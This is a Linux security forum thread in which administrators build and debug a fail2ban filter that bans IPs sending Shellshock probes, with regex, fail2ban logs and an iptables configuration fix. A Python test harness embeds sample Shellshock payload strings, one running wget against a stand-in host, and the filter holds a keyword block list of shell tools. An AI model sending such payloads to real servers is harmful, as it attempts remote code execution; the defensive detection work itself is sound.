Linux - Security
This forum is for all security-related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
I want to make a filter that, well, blocks out the folks if they try a few times. So far ping seems to be the most common, but then again there is a lot in there; I need to look for more things.
That's just it: the patch (since I am all patched to whatever is available; most I had to do from source code because nothing is yet available) is all done on all my servers. (I have many.)
The problem is that these are just the first patches, and as we understand the problem more there will be more. In the meantime I already have clear scanning starting in my logs from experimenters and websites used to detect and look for the flaw. I do not mind that, but I would like to take persistent attempts and block them, to push folks away or at least stop them from going farther; something, anything.
So I want to be clear: I am not filtering instead of patching. I have patched, but would like to take more action. The first versions of the patch (CVE-2012-3410, CVE-2014-6271, CVE-2014-7169) were found not to be fully patched.
Just patching is not enough, in my opinion. If you have a webserver, just grep your logs.
I am going to make a flaky attempt; maybe someone could help me on this. I agree I have things that use wget in my attempt that I know will not work; I am looking at the /bin and the error codes. I only have the logs I have and what I have seen online; maybe folks have some weird logs that show attempts, and we can help form a decent filter.
Definitely going to look closer at that, szboardstretcher.
I don't think I have the right syntax, or if you get what I am saying, maybe that's overkill. Trust me, I did this wrong. Habitual, can you make it like that? I see where you were going with the shellshock, but that was just some guy scanning; the folks who are dirty will not say that.
And the filter put together and done by Habitual (thanks man, you rock):
cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf
[Definition]
#_daemon = apache2
# Option: failregex
# Notes.: regex to match the failures messages of bash in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P<host>\S+)
# Values: TEXT
#
docroot = /var/www/html
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
I have been getting warnings from this as folks try to hit me up. I know it can become better as I see more attacks; it will at least block an IP if it's testing for something, and if you're patched you're at least logging an IP and blocking it too if there is another exploit. It's something better than nothing.
It has been pointed out that my RegEx casts far too wide a net and that my HOST string may catch and ban legitimate traffic on your site with such keywords as shopping or scraping, or a referrer that may utilize "cgi-bin" in its referrer string.
I tested this new failregex using a duplicate line in /var/log/test using
This new failregex scans only for the function and the space right after it that is being abused, regardless of what that function is now, or may be in the future (a new 'variant'?).
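To make the difference between the two failregex versions concrete, here is an added example (not code from the thread or from fail2ban itself) that compiles both patterns the way fail2ban does, by expanding the <HOST> alias quoted in the filter's comments, runs them over a handful of constructed Apache combined-format access.log lines, and reports which client addresses each would ban. The log lines and addresses are made up for the example; fail2ban 0.8 applies failregex with a search, which the helper mirrors. This also covers the earlier suggestion to grep your logs: the same regex works in grep -E if you drop the named group.

```python
import re

# fail2ban expands the <HOST> tag to this group before compiling a failregex
# (the same alias the filter's own comments quote).
HOST = r"(?:::f{4,6}:)?(?P<host>\S+)"

# Revised failregex from the filter: the "() { ... };" shape of a Shellshock
# probe, whatever command follows the ";".
FAILREGEX = re.compile(HOST + r'.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+')

# Earlier keyword-based failregex (now commented out in the filter) that was
# withdrawn because it banned anything mentioning these words in a URL or
# referrer.
OLD_KEYWORDS = "ping|cgi-bin|bash|wget|curl|cat"
OLD_FAILREGEX = re.compile(
    r"^" + HOST + r' .*"(GET|POST) .*\/(?:' + OLD_KEYWORDS + r').*?"'
)

# Constructed Apache combined-format access.log lines (not taken from the
# thread; addresses are from documentation ranges). Combined format records
# the request line, Referer and User-Agent, which is where these probes sit.
SAMPLE_LOG = [
    # Shellshock probe carried in User-Agent, ping variant: should be banned.
    '203.0.113.7 - - [21/Oct/2014:12:19:26 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 - "-" "() { :;}; /bin/bash -c \'ping -c 1 203.0.113.9\'"',
    # Same shape, different command (wget), no cgi-bin in the URL: should be banned.
    '198.51.100.4 - - [21/Oct/2014:12:20:01 +0000] "GET / HTTP/1.1" '
    '200 612 "-" "() { foo;}; /usr/bin/wget http://198.51.100.4/x"',
    # Legitimate cgi-bin request from a browser whose UA has parentheses but
    # no empty "()": must not be banned.
    '192.0.2.10 - - [21/Oct/2014:12:21:00 +0000] "GET /cgi-bin/search.cgi?q=cat HTTP/1.1" '
    '200 1024 "http://example.com/cat-pictures" "Mozilla/5.0 (X11; Linux x86_64) Firefox/33.0"',
    # Legitimate request whose Referer merely contains cgi-bin: must not be banned.
    '192.0.2.11 - - [21/Oct/2014:12:22:00 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "http://example.org/cgi-bin/links" "curl/7.38.0"',
]


def offending_hosts(pattern, lines):
    """Return the <host> group of every line the pattern matches, in log order.

    fail2ban 0.8 applies failregex with re.search, so the same is done here.
    """
    return [m.group("host") for m in map(pattern.search, lines) if m]


def main():
    print("revised failregex would ban:", offending_hosts(FAILREGEX, SAMPLE_LOG))
    print("old keyword regex would ban:", offending_hosts(OLD_FAILREGEX, SAMPLE_LOG))


if __name__ == "__main__":
    main()
```

The revised pattern bans only the two probe lines; the old keyword pattern bans all four, including the two legitimate visitors, because "cgi-bin" appears in their URL or referrer. One caveat worth keeping in mind: a jail reading access.log can only see what Apache writes there. With the combined format that is the request line, Referer and User-Agent, so a payload sent in Cookie or in a custom header never reaches the filter, and with maxretry = 1 a single logged match is enough for a ban.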
Here is my most recent info on the fail2ban filter:
# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf
[Definition]
#_daemon = apache2
# Option: failregex
# Notes.: regex to match the failures messages of bash in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P<host>\S+)
# Values: TEXT
#
# docroot is not referenced by failregex and has no effect on matching.
docroot = /var/www/html
#old original method revised 09/27/14
#shellshock = ping|cgi-bin|bash|wget|curl|cat
#failregex = ^<HOST> .*"(GET|POST) .*\/(?:%(shellshock)s).*?"
# Matches the "() { ... };" function-definition shape of a Shellshock probe
# anywhere after the client address, whatever command follows the ";".
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
All seems good; it grabs and emails me a whois so I can contact the abuse email address.
Code:
cat /var/log/fail2ban.log
2014-10-19 04:48:03,221 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-19 04:48:03,257 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:48:03,283 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 04:48:03,597 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:49:44,232 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-19 04:50:01,389 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 07:57:12,694 fail2ban.actions: WARNING [shellshock] Ban 5.135.35.32
2014-10-19 10:07:12,730 fail2ban.actions: WARNING [shellshock] Unban 5.135.35.32
2014-10-20 04:49:40,675 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-20 04:49:41,294 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 04:49:41,345 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 14:16:41,563 fail2ban.actions: WARNING [dovecot-pop3imap] Ban 218.5.76.26
2014-10-20 16:26:42,220 fail2ban.actions: WARNING [dovecot-pop3imap] Unban 218.5.76.26
2014-10-21 03:34:43,863 fail2ban.actions: WARNING [shellshock] Ban 184.106.228.211
2014-10-21 04:49:37,838 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,210 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,400 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,676 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-21 04:49:38,771 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,807 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,212 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,401 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,773 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,809 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,840 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 05:44:43,883 fail2ban.actions: WARNING [shellshock] Unban 184.106.228.211
2014-10-21 12:19:26,815 fail2ban.actions: WARNING [shellshock] Ban 104.192.0.18
2014-10-21 12:25:46,458 fail2ban.actions: WARNING [shellshock] 104.192.0.18 already banned
2014-10-21 14:29:27,793 fail2ban.actions: WARNING [shellshock] Unban 104.192.0.18
2014-10-22 00:14:30,322 fail2ban.jail : INFO Jail 'dovecot-pop3imap' stopped
2014-10-22 00:14:31,117 fail2ban.jail : INFO Jail 'courierauth' stopped
2014-10-22 00:14:32,093 fail2ban.jail : INFO Jail 'postfix' stopped
2014-10-22 00:14:32,816 fail2ban.jail : INFO Jail 'ssh-ddos' stopped
2014-10-22 00:14:33,161 fail2ban.jail : INFO Jail 'apache-multiport' stopped
2014-10-22 00:14:33,567 fail2ban.jail : INFO Jail 'pureftpd' stopped
2014-10-22 00:14:34,456 fail2ban.jail : INFO Jail 'couriersmtp' stopped
2014-10-22 00:14:35,176 fail2ban.jail : INFO Jail 'ssh' stopped
2014-10-22 00:14:35,718 fail2ban.jail : INFO Jail 'apache' stopped
2014-10-22 00:14:36,170 fail2ban.jail : INFO Jail 'sasl' stopped
2014-10-22 00:14:37,179 fail2ban.jail : INFO Jail 'shellshock' stopped
2014-10-22 00:14:37,417 fail2ban.jail : INFO Jail 'proftpd' stopped
2014-10-22 00:14:37,419 fail2ban.server : INFO Exiting Fail2ban
2014-10-22 00:14:37,694 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-22 00:14:37,695 fail2ban.jail : INFO Creating new jail 'dovecot-pop3imap'
2014-10-22 00:14:37,695 fail2ban.jail : INFO Jail 'dovecot-pop3imap' uses poller
2014-10-22 00:14:37,707 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,707 fail2ban.filter : INFO Set maxRetry = 5
2014-10-22 00:14:37,708 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,708 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,712 fail2ban.jail : INFO Creating new jail 'pam-generic'
2014-10-22 00:14:37,712 fail2ban.jail : INFO Jail 'pam-generic' uses poller
2014-10-22 00:14:37,713 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,713 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,714 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,714 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,719 fail2ban.jail : INFO Creating new jail 'ssh-ddos'
2014-10-22 00:14:37,719 fail2ban.jail : INFO Jail 'ssh-ddos' uses poller
2014-10-22 00:14:37,719 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,720 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,724 fail2ban.jail : INFO Creating new jail 'apache-multiport'
2014-10-22 00:14:37,724 fail2ban.jail : INFO Jail 'apache-multiport' uses poller
2014-10-22 00:14:37,725 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,726 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,729 fail2ban.jail : INFO Creating new jail 'apache-overflows'
2014-10-22 00:14:37,729 fail2ban.jail : INFO Jail 'apache-overflows' uses poller
2014-10-22 00:14:37,730 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,730 fail2ban.filter : INFO Set maxRetry = 2
2014-10-22 00:14:37,731 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,731 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,735 fail2ban.jail : INFO Creating new jail 'couriersmtp'
2014-10-22 00:14:37,735 fail2ban.jail : INFO Jail 'couriersmtp' uses poller
2014-10-22 00:14:37,735 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,737 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,740 fail2ban.jail : INFO Creating new jail 'pureftpd'
2014-10-22 00:14:37,740 fail2ban.jail : INFO Jail 'pureftpd' uses poller
2014-10-22 00:14:37,740 fail2ban.filter : INFO Added logfile = /var/log/syslog
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,742 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,745 fail2ban.jail : INFO Creating new jail 'ssh'
2014-10-22 00:14:37,745 fail2ban.jail : INFO Jail 'ssh' uses poller
2014-10-22 00:14:37,746 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,747 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,816 fail2ban.jail : INFO Creating new jail 'postfix'
2014-10-22 00:14:37,816 fail2ban.jail : INFO Jail 'postfix' uses poller
2014-10-22 00:14:37,816 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,818 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,821 fail2ban.jail : INFO Creating new jail 'sasl'
2014-10-22 00:14:37,821 fail2ban.jail : INFO Jail 'sasl' uses poller
2014-10-22 00:14:37,821 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,823 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,827 fail2ban.jail : INFO Creating new jail 'apache'
2014-10-22 00:14:37,827 fail2ban.jail : INFO Jail 'apache' uses poller
2014-10-22 00:14:37,827 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,828 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,831 fail2ban.jail : INFO Creating new jail 'courierauth'
2014-10-22 00:14:37,831 fail2ban.jail : INFO Jail 'courierauth' uses poller
2014-10-22 00:14:37,832 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,832 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,833 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,833 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,836 fail2ban.jail : INFO Creating new jail 'shellshock'
2014-10-22 00:14:37,836 fail2ban.jail : INFO Jail 'shellshock' uses poller
2014-10-22 00:14:37,837 fail2ban.filter : INFO Added logfile = /var/log/apache2/access.log
2014-10-22 00:14:37,837 fail2ban.filter : INFO Set maxRetry = 1
2014-10-22 00:14:37,838 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,839 fail2ban.actions: INFO Set banTime = 20000
2014-10-22 00:14:37,842 fail2ban.jail : INFO Creating new jail 'proftpd'
2014-10-22 00:14:37,842 fail2ban.jail : INFO Jail 'proftpd' uses poller
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set maxRetry = 6
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,843 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,852 fail2ban.jail : INFO Jail 'dovecot-pop3imap' started
2014-10-22 00:14:37,854 fail2ban.jail : INFO Jail 'pam-generic' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'apache-multiport' started
2014-10-22 00:14:37,856 fail2ban.jail : INFO Jail 'apache-overflows' started
2014-10-22 00:14:37,857 fail2ban.jail : INFO Jail 'couriersmtp' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'pureftpd' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'ssh' started
2014-10-22 00:14:37,859 fail2ban.jail : INFO Jail 'postfix' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'sasl' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'apache' started
2014-10-22 00:14:37,862 fail2ban.jail : INFO Jail 'courierauth' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'proftpd' started
2014-10-22 04:49:33,038 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 04:49:40,900 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 21:36:21,767 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:28,922 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:36,139 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:44,704 fail2ban.actions: WARNING [pureftpd] Ban 60.176.110.32
2014-10-23 21:36:45,336 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 23:46:45,404 fail2ban.actions: WARNING [pureftpd] Unban 60.176.110.32
2014-10-24 04:49:40,119 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,409 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,448 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,519 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,615 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,627 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,656 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,766 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,851 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-24 04:49:41,121 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,411 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,450 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,617 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,768 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 19:02:44,194 fail2ban.actions: WARNING [ssh] Ban 222.186.21.66
2014-10-24 19:02:47,206 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:50,210 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:53,213 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,217 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,518 fail2ban.actions: WARNING [pam-generic] Ban 222.186.21.66
2014-10-24 21:12:44,794 fail2ban.actions: WARNING [ssh] Unban 222.186.21.66
2014-10-24 21:12:58,261 fail2ban.actions: WARNING [pam-generic] Unban 222.186.21.66
2014-10-25 04:49:39,765 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
I go and install on a newer setup and I get an error:
# cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:30:37,210 fail2ban.filter : INFO Set findtime = 600
2014-10-25 12:30:37,210 fail2ban.actions: INFO Set banTime = 259200
2014-10-25 12:30:37,275 fail2ban.jail : INFO Jail 'ssh' started
2014-10-25 12:30:37,292 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-25 12:30:37,305 fail2ban.jail : INFO Jail 'apache' started
2014-10-25 12:30:37,345 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-25 12:30:37,371 fail2ban.actions.action: ERROR iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:30:37,386 fail2ban.jail : INFO Jail 'asterisk-iptables' started
2014-10-25 12:35:46,834 fail2ban.filter : INFO Set findtime = 600
2014-10-25 12:35:46,834 fail2ban.actions: INFO Set banTime = 259200
2014-10-25 12:35:46,893 fail2ban.jail : INFO Jail 'ssh' started
2014-10-25 12:35:46,917 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-25 12:35:46,935 fail2ban.jail : INFO Jail 'apache' started
2014-10-25 12:35:46,970 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-25 12:35:46,980 fail2ban.actions.action: ERROR iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:35:46,997 fail2ban.jail : INFO Jail 'asterisk-iptables' started
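The iptables command in that error is failing on `-p http`: iptables' `-p` takes an IP protocol name from /etc/protocols (tcp, udp, icmp, ...), whereas `http` is a service name that is valid for `--dport` but not for `-p`. fail2ban 0.8 logs a failed action's os.system() wait status in hex, so "returned 200" is 0x200, i.e. exit code 2, which iptables uses for a rejected command-line parameter. The jail excerpt below is an added example, not the poster's jail.conf (the thread does not show it); it assumes fail2ban 0.8.x with its stock `iptables` action, whose rule template is `iptables -I INPUT -p <protocol> --dport <port> -j fail2ban-<name>`, and reuses the maxretry and bantime values the earlier server's log reports for this jail.

```ini
# jail.local excerpt (added example). The stock iptables action substitutes
# <protocol> into "iptables -p" and <port> into "--dport", so <protocol>
# must be an IP protocol while <port> may be a number or a service name.

# Broken: protocol=http ends up as "iptables -p http", which iptables
# rejects with exit code 2 (fail2ban 0.8 logs that as "returned 200").
#[shellshock]
#enabled  = true
#filter   = shellshock
#action   = iptables[name=shellshock, port=http, protocol=http]
#logpath  = /var/log/apache2/access.log
#maxretry = 1
#bantime  = 20000

# Fixed: the protocol is tcp; the port keeps its service name (80 also works).
[shellshock]
enabled  = true
filter   = shellshock
action   = iptables[name=shellshock, port=http, protocol=tcp]
logpath  = /var/log/apache2/access.log
maxretry = 1
bantime  = 20000
```

After changing the jail, restart fail2ban and confirm the chain exists with `iptables -L fail2ban-shellshock -n`; if the action still errors, the fail2ban log will show the exact iptables command line it tried, as it did above.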